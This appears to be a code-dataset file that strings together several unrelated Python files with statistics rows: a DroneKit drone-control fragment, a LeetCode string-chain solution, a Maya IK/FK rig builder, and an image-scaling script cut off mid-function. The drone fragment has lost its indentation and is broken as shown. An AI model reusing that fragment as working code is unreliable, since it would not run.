del drone_pool[drone_id]
return { "status" : "OK", "id" : drone_id }
def run_mission(drone, target_height, waypoints):
while True:
print(("Reaching target alt : " + str(drone.location.global_relative_frame.alt)))
if drone.location.global_relative_frame.alt >= target_height * 0.9:
break
print ('target alt reached')
mavparser.create_mission(drone, waypoints)
print ('mission acquired')
drone.mode = VehicleMode('AUTO')
print ('initiating sequence')
print ('in mission')
def attach_listener(kwargs):
attr = kwargs.get('attr', None)
fn = kwargs.get('fn', None)
attach_fn = kwargs.get('attach_fn', None)
if not fn == None and not attr == None and not attach_fn == None:
attach_fn(attr, fn)
def takeoff_drone(kwargs):
global q
drone_id = kwargs.get("drone_id", None)
target_height = kwargs.get("target_height", 10)
waypoints = kwargs.get("waypoints", None)
try:
drone = drone_pool[drone_id]
except:
raise
drone.initialize()
drone.mode = VehicleMode('GUIDED')
drone.armed = True
while not drone.armed:
time.sleep(1)
drone.simple_takeoff(target_height)
print (waypoints)
if waypoints:
run_mission(drone, target_height, waypoints)
def detach_event_listeners(drone, value, status):
drone.remove_attribute_listener('location', update_location)
drone.remove_attribute_listener('airspeed', update_airspeed)
drone.remove_attribute_listener('attitude', udpate_attitude)
drone.remove_attribute_listener('heading', update_heading)
node.update_drone(drone_id, { "location" : {"lat": value.global_relative_frame.lat, "lon": value.global_relative_frame.lon, "alt": value.global_relative_frame.alt}, "status": status})
return
def update_location(self, attr_name, value):
node.update_drone(drone_id, { "location" : {"lat": value.global_relative_frame.lat, "lon": value.global_relative_frame.lon, "alt": value.global_relative_frame.alt}, "status": "FLYING"})
command_len = len(drone.commands)
wp_len = len(waypoints)
if command_len >= wp_len :
diff = command_len - wp_len
   next_wp = max(drone.commands.next - diff, 0) % len(waypoints)
waypoint = waypoints[next_wp]
# print "df: " + `diff`
# print next_wp
node.update_drone(drone_id, { "waypoint" : waypoint })
if drone.mode == VehicleMode('LAND') and drone.location.global_relative_frame.alt <= 0.1:
detach_event_listeners(drone, value, "HALTED")
return
  if drone.commands.next == len(drone.commands):
detach_event_listeners(drone, value, "FINISHED")
return
def update_airspeed(self, attr_name, value):
node.update_drone(drone_id, {"airspeed": value})
def udpate_attitude(self, attr_name, value):
node.update_drone(drone_id, { "pitch": value.pitch, 'roll': value.roll, 'yaw': value.yaw })
def update_heading(self, attr_name, value):
node.update_drone(drone_id, { "heading": value })
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'location', "fn" : update_location }))
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'airspeed', "fn" : update_airspeed }))
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'attitude', "fn" : udpate_attitude }))
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'heading', "fn" : update_heading }))
print ('took off')
return True
def land_drone(kwargs):
drone_id = kwargs.get("drone_id", None)
try:
drone = drone_pool[drone_id]
except:
raise
if not drone.armed:
return False
cmds = drone.commands
cmds.wait_ready()
cmds.clear()
drone.mode = VehicleMode('LAND')
print((drone.mode))
return True
| 27.133621 | 187 | 0.707705 | 697 | 0.110723 | 0 | 0 | 0 | 0 | 0 | 0 | 960 | 0.152502 |
6a19dea1f3bc079f6c50613369f0699df82e34cf | 2,365 | py | Python | Problemset/longest-string-chain/longest-string-chain.py | KivenCkl/LeetCode | fcc97c66f8154a5d20c2aca86120cb37b9d2d83d | [
"MIT"
] | 7 | 2019-05-08T03:41:05.000Z | 2020-12-22T12:39:43.000Z | Problemset/longest-string-chain/longest-string-chain.py | Yuziquan/LeetCode | 303fc1c8af847f783c4020bd731b28b72ed92a35 | [
"MIT"
] | 1 | 2021-07-19T03:48:35.000Z | 2021-07-19T03:48:35.000Z | Problemset/longest-string-chain/longest-string-chain.py | Yuziquan/LeetCode | 303fc1c8af847f783c4020bd731b28b72ed92a35 | [
"MIT"
] | 7 | 2019-05-10T20:43:20.000Z | 2021-02-22T03:47:35.000Z |
# @Title: Longest String Chain
# @Author: KivenC
# @Date: 2019-05-26 20:35:25
# @Runtime: 144 ms
# @Memory: 13.3 MB
class Solution:
# # way 1
# def longestStrChain(self, words: List[str]) -> int:
    #     # dynamic programming
    #     # dp[i] = max(dp[i], dp[j] + 1) (0 <= j < i and words[j] is a predecessor of words[i])
# length = len(words)
# if length < 2:
# return length
# dp = [1 for _ in range(length)]
    #     words.sort(key=len) # sort words by increasing length
# for i in range(1, length):
    #         if i >= 1 and words[i] == words[i - 1]: # skip duplicates
# continue
# for j in range(i - 1, -1, -1):
    #             if len(words[i]) - len(words[j]) > 1: # prune the search
# break
# if len(words[i]) == len(words[j]):
# continue
# if self.isPre(words[j], words[i]):
# dp[i] = max(dp[i], dp[j] + 1)
# return max(dp)
# def isPre(self, word1: str, word2: str) -> bool:
    #     # check whether word1 is a predecessor of word2
    #     # two-pointer approach
# # i, j, length1, length2 = 0, 0, len(word1), len(word2)
# # while i < length1 and j < length2:
# # if word1[i] == word2[j]:
# # i += 1
# # j += 1
# # if length2 - length1 == 1 and i == length1:
# # return True
# # return False
    #     # drop one character from word2 at each position and compare the result with word1
# if len(word1) + 1 != len(word2):
# return False
# for i in range(len(word2)):
# if word2[: i] + word2[i + 1:] == word1:
# return True
# return False
# way 2
def longestStrChain(self, words: List[str]) -> int:
import collections
length = len(words)
if length < 2:
return length
        pool = collections.defaultdict(list) # group the words by their length
dp = {}
for word in words:
pool[len(word)].append(word)
for key in sorted(pool.keys()):
if key - 1 not in pool:
continue
for word in pool[key]:
for j in range(key):
tmp = word[: j] + word[j + 1:]
if tmp in pool[key - 1]:
dp[word] = max(dp.get(word, 1), dp.get(tmp, 1) + 1)
return max(dp.values()) if dp else 1
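# Example (added; hypothetical call outside the LeetCode harness):
#   Solution().longestStrChain(["a", "b", "ba", "bca", "bda", "bdca"]) returns 4,
#   corresponding to the chain a -> ba -> bda -> bdca.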
| 33.785714 | 81 | 0.442283 | 2,365 | 0.944112 | 0 | 0 | 0 | 0 | 0 | 0 | 1,734 | 0.692216 |
6a19e8bf83375a817e65cca3fb4f7daafac8434e | 21,107 | py | Python | IKFK Builder/IKFK_Builder.py | ssimbox/ssimbox-rigTools | 824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c | [
"MIT"
] | 1 | 2021-01-19T13:36:42.000Z | 2021-01-19T13:36:42.000Z | IKFK Builder/IKFK_Builder.py | ssimbox/sbx-autorig | 824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c | [
"MIT"
] | 2 | 2021-03-29T22:15:08.000Z | 2021-03-29T22:17:37.000Z | IKFK Builder/IKFK_Builder.py | ssimbox/ssimbox-rigTools | 824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c | [
"MIT"
] | null | null | null | from ctrlUI_lib import createClav2, createSphere
import maya.cmds as cmds
import maya.OpenMaya as om
from functools import partial
def duplicateChain(*args):
global ogChain
global chainLen
global switcherLoc
global side
global controllerColor
global clavCheckbox
global rigGrp, ctrlGrp
ogRootchain = cmds.ls(sl = True, type = "joint")[0]
ogChain = cmds.listRelatives(ogRootchain, ad = True, type = "joint")
ogChain.append(ogRootchain)
ogChain.reverse()
side = ogRootchain[0:2]
# Initialize input from UI
scaleController = cmds.intField(scaleField_UI, q=1, v=1)
blendCheckbox = cmds.checkBox(blendCheckbox_UI, q=1, v=1)
constraintCheckBox = cmds.checkBox(constraintCheckBox_UI, q=1, v=1)
chainMenu = cmds.optionMenu("chainMenu_UI", q=1, v=1)
clavCheckbox = cmds.checkBox(clavCheckbox_UI, q=1, v=0)
if side == "l_": controllerColor = rgb=(0, 0, 255)
elif side == "r_": controllerColor = rgb=(255, 0, 0)
if chainMenu == "Leg": chainLen = 5
else: #this is totally unscalable but for now it's ok
chainLen = 3
#suffix for the new chains
newJointList = ["_ik", "_fk", "_scale"]
for newJoint in newJointList:
for i in range(chainLen):
if blendCheckbox == 0 and constraintCheckBox == 0:
cmds.error("pls, select one relation type")
break
newJointName = ogChain[i] + newJoint
#create a joint, copy their position and freeze transform
cmds.joint(n = newJointName)
cmds.matchTransform(newJointName, ogChain[i])
cmds.makeIdentity(newJointName, a = 1, t = 0, r = 1, s = 0)
#deselect to make the two different hierarchies
cmds.select(cl = 1)
cmds.parent((ogChain[0] + "_ik"), world = True)
cmds.setAttr(ogChain[0] + "_ik.visibility", 0)
cmds.setAttr(ogChain[0] + "_fk.visibility", 0)
# Create a locator used for switching IK/FK mode and snap it between two joints
switcherLoc = cmds.spaceLocator(n=side + chainMenu + "_ikfk_Switch")
switcherLocGrp = cmds.group(em=1, n=switcherLoc[0] + "_grp")
cmds.color(switcherLoc, rgb=(255, 255, 0)) #yellow
cmds.delete(cmds.pointConstraint(switcherLoc, switcherLocGrp))
cmds.parent(switcherLoc, switcherLocGrp)
cmds.delete(cmds.pointConstraint(ogChain[1], ogChain[2], switcherLocGrp))
cmds.addAttr(switcherLoc, ln="FKIK_Mode", at="short", min=0, max=1, k=1, r=1)
cmds.move(0,0,-12, switcherLocGrp, r=1) #IMPROVE THIS SHIT
cmds.parentConstraint(ogChain[1], switcherLocGrp, mo=1)
#remove .t, .r, .s and .v from the channelbox
for coord in ["X", "Y", "Z"]:
cmds.setAttr(switcherLoc[0] + ".translate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".rotate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".scale" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".visibility", k=0, l=1)
# Create hierarchy groups
rigGrp = cmds.group(em=1, n= side + chainMenu + "_rig_grp")
ctrlGrp = cmds.group(em=1, n= side + chainMenu + "_ctrl_grp")
cmds.delete(cmds.parentConstraint(ogChain[0], rigGrp))
cmds.delete(cmds.parentConstraint(ogChain[0], ctrlGrp))
cmds.parent(ctrlGrp, rigGrp)
# Execute
if blendCheckbox == 1:
blendNodeFunc(scaleController, chainMenu)
if constraintCheckBox == 1:
constraintFunc(scaleController, chainMenu)
if clavCheckbox == 1:
clavSel(scaleController)
else:
cmds.parent(ogChain[0] + "_ik", ogChain[0] + "_fk", ctrlGrp)
cmds.parent(ogChain[0] + "_fk_anim_grp", ctrlGrp)
cmds.parent(switcherLocGrp, rigGrp)
def clavSel(scaleClav):
# Select clavicle Joint moving up and put it at the top of the chain
clavJoint = cmds.pickWalk(ogChain[0], d="up")[0]
#ogChain.insert(0, clavJoint)
clavController = createClav2(clavJoint + "_anim") # Import coordinates from ctrlUI_lib
cmds.delete(cmds.pointConstraint(clavJoint, clavController))
# Create offset group, FDH and move up
clavControllerGrp = cmds.group(n=clavController + "_grp", em=1)
cmds.delete(cmds.parentConstraint(clavJoint, clavControllerGrp))
cmds.parent(clavController, clavControllerGrp)
fixedScale = scaleClav/4
cmds.scale(fixedScale, fixedScale, fixedScale, clavController)
cmds.makeIdentity(clavController, a=1)
cmds.move(0,10,0, clavControllerGrp, ws=1, r=1)
cmds.color(clavController, rgb=controllerColor)
# Move pivots on clavicle joint
piv = cmds.xform(clavJoint, q=True, ws=True, t=True)
cmds.xform(clavController, ws=True, piv=piv)
cmds.xform(clavControllerGrp, ws=True, piv=piv)
cmds.orientConstraint(clavController, clavJoint)
# Parent ik and fk chain under clavicle controller
cmds.parent((ogChain[0]+"_fk_anim_grp"),(ogChain[0] + "_ik"), (ogChain[0] + "_fk"), clavController)
cmds.parent(clavControllerGrp, ctrlGrp)
def visCheck(vis):
if vis == "Arm":
asd = True
if vis == "Leg":
asd = False
cmds.checkBox(clavCheckbox_UI, e=1, vis=asd, v=asd)
# Buttons +1 and +3
count = 0
def addOneUnit(*args):
global count
count = count + 1
cmds.intField(scaleField_UI, v=1+count, e=1)
def addThreeUnit(*args):
global count
count = count + 3
cmds.intField(scaleField_UI, v=1+count, e=1)
def blendNodeFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
blendColorsNode = cmds.createNode("blendColors", n = ogChain[x] + "_blend")
# Connect FK and IK chains into blendColors channels and then connect the output to the original joint chain
cmds.connectAttr((ogChain[x] + "_ik.rotate"), blendColorsNode + ".color1")
cmds.connectAttr((ogChain[x] + "_fk.rotate"), blendColorsNode + ".color2")
cmds.connectAttr((blendColorsNode + ".output"), (ogChain[x] + ".rotate" ))
cmds.connectAttr(switcherLoc[0]+".FKIK_Mode", blendColorsNode + ".blender")
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def constraintFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
# Setup orient constraints
cmds.parentConstraint((ogChain[x] + "_ik"), ogChain[x])
cmds.parentConstraint((ogChain[x] + "_fk"), ogChain[x])
# Setup SDK naming convention
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
ikSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_ikW0"
fkSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_fkW1"
# Setup SDK
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=0, dv=1)
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def fkControllerCreator(fkSize, legOrArm):
orientController = cmds.optionMenu("UI_orientControllerMenu", q=1, v=1)
# Create controllers and group offsets
# Change rotation, color
for y in range(chainLen):
anim_group = cmds.group(em=1, n=ogChain[y] + "_fk_anim_grp")
fk_controller = cmds.circle(n=ogChain[y] + "_fk_anim")[0] # If not [0] it'll warn some stuff related to Maya underworld
# Set scale
cmds.scale(fkSize, fkSize, fkSize, fk_controller)
cmds.matchTransform(anim_group, ogChain[y])
cmds.delete(cmds.parentConstraint(ogChain[y], fk_controller))
cmds.parent(fk_controller, anim_group)
# Set controller orientation based on second axis
if orientController == "x": cmds.rotate(90,0,0, fk_controller)
if orientController == "y": cmds.rotate(0,90,0, fk_controller)
if orientController == "z": cmds.rotate(0,0,90, fk_controller)
# Freeze transform, delete history and set color
cmds.makeIdentity(fk_controller, a = 1, t = 1, r = 1, s = 0)
cmds.delete(fk_controller, ch = 1)
cmds.color(fk_controller, rgb=controllerColor)
# Set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=0, dv=1)
# Lock .t and .s attributes
#for x in ["X", "Y", "Z"]:
#cmds.setAttr(fk_controller + ".translate" + x, k=0, l=1)
#cmds.setAttr(fk_controller + ".scale" + x, k=0, l=1)
# Create ordered hierarchy
for x in reversed(range(chainLen)):
if x == 0:
continue
cmds.parent(ogChain[x] + "_fk_anim_grp", ogChain[x-1] + "_fk_anim")
# Set orientConstraint _anim controllers with _fk hierarchy
for x in range(chainLen):
cmds.parentConstraint(ogChain[x] + "_fk_anim", ogChain[x] + "_fk")
# If leg chain is selected delete toe controller, else not
if legOrArm == "Leg":
if x == (chainLen-1):
cmds.delete(ogChain[chainLen-1] + "_fk_anim_grp")
def ikChainBuild(scaleIK, HandleName):
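# Build the rotate-plane IK handle from the first to the third joint of the duplicated _ik chain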
masterIkHandle = cmds.ikHandle(sj=ogChain[0] + "_ik", ee=ogChain[2] + "_ik", sol="ikRPsolver", n=side + HandleName + "_ikHandle")
cmds.setAttr(masterIkHandle[0] + ".visibility", 0)
if HandleName == "Arm":
#print ("scaleController", scaleField_UI)
armIk(scaleIK, masterIkHandle, HandleName)
else:
#print ("scaleController", scaleField_UI)
legIK(scaleIK, masterIkHandle, HandleName)
def armIk(armIkScale, armikHandle, pvName):
ikHandJoint = cmds.joint(n=side + "hand_ik")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", ikHandJoint))
cmds.makeIdentity(ikHandJoint, a = 1, t = 1, r = 1, s = 0)
if side == "l_":
cmds.move(10,0,0, ikHandJoint, r=1, os=1)
else:
cmds.move(-10,0,0, ikHandJoint, r=1, os=1)
cmds.parent(ikHandJoint, ogChain[2] + "_ik")
handikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ikHandJoint, n=side + "hand_ikHandle", sol="ikSCsolver")
cmds.parent(handikHandle[0], armikHandle[0])
#create IK controller ---> CUBE
crvIkCube = cmds.curve(d=1, p=[(-0.5, 0.5, -0.5), (0.5, 0.5, -0.5), (0.5, 0.5, 0.5),
(-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5), (-0.5, -0.5, -0.5),
(-0.5, 0.5, -0.5), (-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5),
(0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (0.5, 0.5, -0.5),
(0.5, -0.5, -0.5), (0.5, -0.5, 0.5), (0.5, -0.5, -0.5), (-0.5, -0.5, -0.5)],
k=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5], n=side + "hand_ik_anim" )
# Rename shape node
shapeList = cmds.listRelatives(crvIkCube, s = True)
cmds.rename(shapeList, crvIkCube + "Shape")
crvIkCubeGrp = cmds.group(n=crvIkCube + "_grp")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", crvIkCubeGrp))
cmds.color(crvIkCube, rgb=controllerColor)
cmds.scale(armIkScale, armIkScale, armIkScale, crvIkCubeGrp)
cmds.parent(armikHandle[0], crvIkCube)
pvController = createSphere(nome= side+pvName+"_PV")
findPoleVector(loc=pvController, targetHandle=armikHandle[0])
cmds.addAttr(pvController, at="enum", enumName = "------", ln="Attributes", k=1, r=1)
cmds.addAttr(pvController, ln="Follow", k=1, r=1, min=0, max=1)
cmds.addAttr(pvController, ln="Follow_Clav_Hand", k=1, r=1, min=0, max=1, dv=0.5)
# Parent ikController and PV under _rig_GRP
cmds.parent(crvIkCubeGrp, pvController + "_grp" ,rigGrp)
#set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=0, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=1, dv=1)
def legIK(ikFootScale, legikHandle, pvName):
ballikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ogChain[3] + "_ik", sol="ikSCsolver", n=side + "ball_ikHandle")
toeikHandle = cmds.ikHandle(sj=ogChain[3] + "_ik", ee=ogChain[4] + "_ik", sol="ikSCsolver", n=side + "toe_ikHandle")
# Create and place ik controller
ikFootControl = cmds.curve(d=2, p=[(0.997, 0, 1.789), (0, 0, 2.39), (-0.997,0,1.789), (-1.108, 0, 0), (-0.784, 0,-2.5),
(0, 0,-3), (0.784, 0, -2.5), (1.108, 0, 0), (0.997, 0, 1.789), (0, 0, 2.39)],
k=[0,1,2,3,4,5,6,7,8,9,10], n=side + "leg_anim_ik")
# Rename shape node
shapeList = cmds.listRelatives(ikFootControl, s = True)
cmds.rename(shapeList, ikFootControl + "Shape")
ikFootControlGrp = cmds.group(em=1, n=ikFootControl + "_grp")
cmds.parent(ikFootControl, ikFootControlGrp)
# Set size, freeze transform, create offset group and color
cmds.scale(ikFootScale, ikFootScale, ikFootScale, ikFootControlGrp)
cmds.move(0,-3.2,0, ikFootControl, r=1)
cmds.makeIdentity(ikFootControl, a = 1, t = 1, r = 1, s = 1)
cmds.delete(ikFootControl, ch = 1)
cmds.delete(cmds.pointConstraint(ogChain[3] + "_ik", ikFootControlGrp))
cmds.color(ikFootControl, rgb=controllerColor)
# pivot snapping on ankle joint
piv = cmds.xform(ogChain[2], q=True, ws=True, t=True)
cmds.xform(ikFootControl, ws=True, piv=piv)
cmds.parent(ballikHandle[0], toeikHandle[0], legikHandle[0], ikFootControl)
#---------- Making Pole Vector -------------#
# Pole Vector controller ---> Sphere
pvController = createSphere(nome= side+pvName+"_PV")
findPoleVector(loc=pvController, targetHandle=legikHandle[0])
cmds.addAttr(pvController, ln="Follow", k=1, r=1, min=0, max=1)
cmds.addAttr(pvController, ln="Follow_Leg_Foot", k=1, r=1, min=0, max=1, dv=0.5)
# Create attributes on ikController
cmds.addAttr(ikFootControl, at="enum",enumName = "------", ln="Attributes", k=1, r=1)
cmds.addAttr(ikFootControl, ln="Twist", k=1, r=1)
cmds.addAttr(ikFootControl, ln="Lateral_Roll", k=1, r=1)
for bone in ["Ankle", "Ball", "Toe_Tap"]:
cmds.addAttr(ikFootControl, at="enum", enumName = "------", ln=bone, k=1, r=1)
for coord in ["X", "Y", "Z"]:
cmds.addAttr(ikFootControl, ln=bone+coord, k=1, r=1)
# Parent ikController and PV under _rig_GRP
cmds.parent(ikFootControlGrp, pvController + "_grp" ,rigGrp)
# Set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ikFootControlGrp + ".visibility", cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=0, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ikFootControlGrp + ".visibility", cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=1, dv=1)
def findPoleVector(loc, targetHandle):
# This func is kinda black magic
# All credits to https://vimeo.com/66015036
start = cmds.xform(ogChain[0], q=1, ws=1, t=1)
mid = cmds.xform(ogChain[1], q=1, ws=1, t=1)
end = cmds.xform(ogChain[2], q=1, ws=1, t=1)
startV = om.MVector(start[0], start[1], start[2])
midV = om.MVector(mid[0], mid[1], mid[2])
endV = om.MVector(end[0], end[1], end[2])
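# Project the mid joint onto the start->end axis to find the closest point on that line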
startEnd = endV - startV
startMid = midV - startV
dotP = startMid * startEnd
proj = float(dotP) / float(startEnd.length())
startEndN = startEnd.normal()
projV = startEndN * proj
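# The offset from that projected point back towards the mid joint gives the pole vector direction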
arrowV = startMid - projV
arrowV *= 10 # distance from joint
finalV = arrowV + midV
cmds.xform(loc, ws=1, t=(finalV.x, finalV.y ,finalV.z))
locGrp = cmds.group(em=1, n=loc + "_grp")
#snap, parent offsetGrp, set color and then make Constraint
cmds.delete(cmds.pointConstraint(loc, locGrp))
cmds.parent(loc, locGrp)
cmds.makeIdentity(loc, a=1, t=1, r=1, s=1)
cmds.color(loc, rgb=controllerColor)
cmds.poleVectorConstraint(loc, targetHandle)
def showUI():
global chainMenu_UI
global scaleField_UI
global orientControllerMenu
global constraintCheckBox_UI
global blendCheckbox_UI
global plusOne_UI
global plusThree_UI
global clavCheckbox_UI
if cmds.window("switchModeUI", ex = 1): cmds.deleteUI("switchModeUI")
myWin = cmds.window("switchModeUI", t="IKFK Builder", w=300, h=300, s=1)
mainLayout = cmds.formLayout(nd=50)
# Useful in selecting which chain: Leg or Arm?
chainMenu_UI = cmds.optionMenu("chainMenu_UI", l="Which chain?", cc=visCheck)
cmds.menuItem(l="Leg")
cmds.menuItem(l="Arm")
constraintCheckBox_UI = cmds.checkBox(label = "orientConsts+SDK Mode", v=0,
cc= lambda state: (cmds.checkBox(blendCheckbox_UI, e=1, en=state-1)))
blendCheckbox_UI = cmds.checkBox(label = "blendColor Mode", v=0,
cc= lambda state: (cmds.checkBox(constraintCheckBox_UI, e=1, en=state-1)))
clavCheckbox_UI = cmds.checkBox(l="Clavicle", vis=0)
# Useful in orienting FK controllers as the user wishes. Maybe this can be improved
orientControllerMenu = cmds.optionMenu("UI_orientControllerMenu", l="What's the secondary axis")
cmds.menuItem(l="x")
cmds.menuItem(l="y")
cmds.menuItem(l="z")
# Scale the UI becase you'll never know
scaleControllerText = cmds.text(l="Controllers size")
scaleField_UI = cmds.intField(en=10, v=1, min=1)
plusOne_UI = cmds.button(l="+1", c=addOneUnit)
plusThree_UI = cmds.button(l="+3", c=addThreeUnit)
separator01 = cmds.separator(h=5)
separator02 = cmds.separator(h=5)
#
execButton = cmds.button(l="Duplicate Chain", c=partial(duplicateChain, blendNodeFunc, constraintFunc))
cmds.formLayout(mainLayout, e=1,
attachForm = [
(chainMenu_UI, "left", 8), (chainMenu_UI, "top", 5), (chainMenu_UI, "right", 80),
(clavCheckbox_UI, "top", 7),
(blendCheckbox_UI, "left", 5),
(separator01, "left", 1), (separator01, "right", 2),
#--------------------
(scaleField_UI, "right", 65), (scaleField_UI, "left", 5),
(plusOne_UI, "right", 5),
(plusThree_UI, "right", 5),
(scaleControllerText, "left", 5),
(separator02, "left", 1), (separator02, "right", 2),
#--------------------
(orientControllerMenu, "left", 8), (orientControllerMenu, "top", 5),
#--------------------
(execButton, "bottom", 5), (execButton, "left", 5), (execButton, "right", 5),
],
attachControl = [(clavCheckbox_UI, "left", 10, chainMenu_UI),
(constraintCheckBox_UI, "top", 5, chainMenu_UI),
(blendCheckbox_UI, "top", 5, chainMenu_UI),
(separator01, "top", 5, constraintCheckBox_UI),
(scaleField_UI, "top", 5, separator01),
(scaleControllerText, "top", 8, separator01),
(plusOne_UI, "top", 4, separator01),
(plusThree_UI, "top", 4, separator01),
(separator02, "top", 6, scaleField_UI),
(orientControllerMenu, "top", 6, separator02),
],
attachPosition = [#(clavCheckbox_UI, "right", 0, 10),
(constraintCheckBox_UI, "left", 0, 26), (blendCheckbox_UI, "right", 10, 24),
(scaleControllerText, "left", 5, 0), (scaleField_UI, "left", 110, 0), #(scaleField_UI, "right",0, 40),
(plusOne_UI, "right", 0, 45),
(plusThree_UI, "right", 0, 49)
]
)
cmds.showWindow(myWin)
showUI() | 41.386275 | 140 | 0.607713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,224 | 0.200123 |
6a1cf3b76d95e590eb1efa6bc9673c121f9d7242 | 5,128 | py | Python | pipng/imagescale-q-m.py | nwiizo/joke | 808c4c998cc7f5b7f6f3fb5a3ce421588a70c087 | [
"MIT"
] | 1 | 2017-01-11T06:12:24.000Z | 2017-01-11T06:12:24.000Z | pipng/imagescale-q-m.py | ShuyaMotouchi/joke | 808c4c998cc7f5b7f6f3fb5a3ce421588a70c087 | [
"MIT"
] | null | null | null | pipng/imagescale-q-m.py | ShuyaMotouchi/joke | 808c4c998cc7f5b7f6f3fb5a3ce421588a70c087 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright © 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import argparse
import collections
import math
import multiprocessing
import os
import sys
import Image
import Qtrac
Result = collections.namedtuple("Result", "copied scaled name")
Summary = collections.namedtuple("Summary", "todo copied scaled canceled")
def main():
size, smooth, source, target, concurrency = handle_commandline()
Qtrac.report("starting...")
summary = scale(size, smooth, source, target, concurrency)
summarize(summary, concurrency)
def handle_commandline():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--concurrency", type=int,
default=multiprocessing.cpu_count(),
help="specify the concurrency (for debugging and "
"timing) [default: %(default)d]")
parser.add_argument("-s", "--size", default=400, type=int,
help="make a scaled image that fits the given dimension "
"[default: %(default)d]")
parser.add_argument("-S", "--smooth", action="store_true",
help="use smooth scaling (slow but good for text)")
parser.add_argument("source",
help="the directory containing the original .xpm images")
parser.add_argument("target",
help="the directory for the scaled .xpm images")
args = parser.parse_args()
source = os.path.abspath(args.source)
target = os.path.abspath(args.target)
if source == target:
parser.error("source and target must be different")
if not os.path.exists(args.target):
os.makedirs(target)
return args.size, args.smooth, source, target, args.concurrency
def scale(size, smooth, source, target, concurrency):
canceled = False
jobs = multiprocessing.JoinableQueue()
results = multiprocessing.Queue()
create_processes(size, smooth, jobs, results, concurrency)
todo = add_jobs(source, target, jobs)
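# Block until every queued job is marked done; the workers are daemon processes and exit with the main process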
try:
jobs.join()
except KeyboardInterrupt: # May not work on Windows
Qtrac.report("canceling...")
canceled = True
copied = scaled = 0
while not results.empty(): # Safe because all jobs have finished
result = results.get_nowait()
copied += result.copied
scaled += result.scaled
return Summary(todo, copied, scaled, canceled)
def create_processes(size, smooth, jobs, results, concurrency):
for _ in range(concurrency):
process = multiprocessing.Process(target=worker, args=(size,
smooth, jobs, results))
process.daemon = True
process.start()
def worker(size, smooth, jobs, results):
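# Each worker pulls (source, target) pairs off the shared queue and reports one Result per image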
while True:
try:
sourceImage, targetImage = jobs.get()
try:
result = scale_one(size, smooth, sourceImage, targetImage)
Qtrac.report("{} {}".format("copied" if result.copied else
"scaled", os.path.basename(result.name)))
results.put(result)
except Image.Error as err:
Qtrac.report(str(err), True)
finally:
jobs.task_done()
def add_jobs(source, target, jobs):
todo = 0
for todo, name in enumerate(os.listdir(source), start=1):
sourceImage = os.path.join(source, name)
targetImage = os.path.join(target, name)
jobs.put((sourceImage, targetImage))
return todo
def scale_one(size, smooth, sourceImage, targetImage):
oldImage = Image.from_file(sourceImage)
if oldImage.width <= size and oldImage.height <= size:
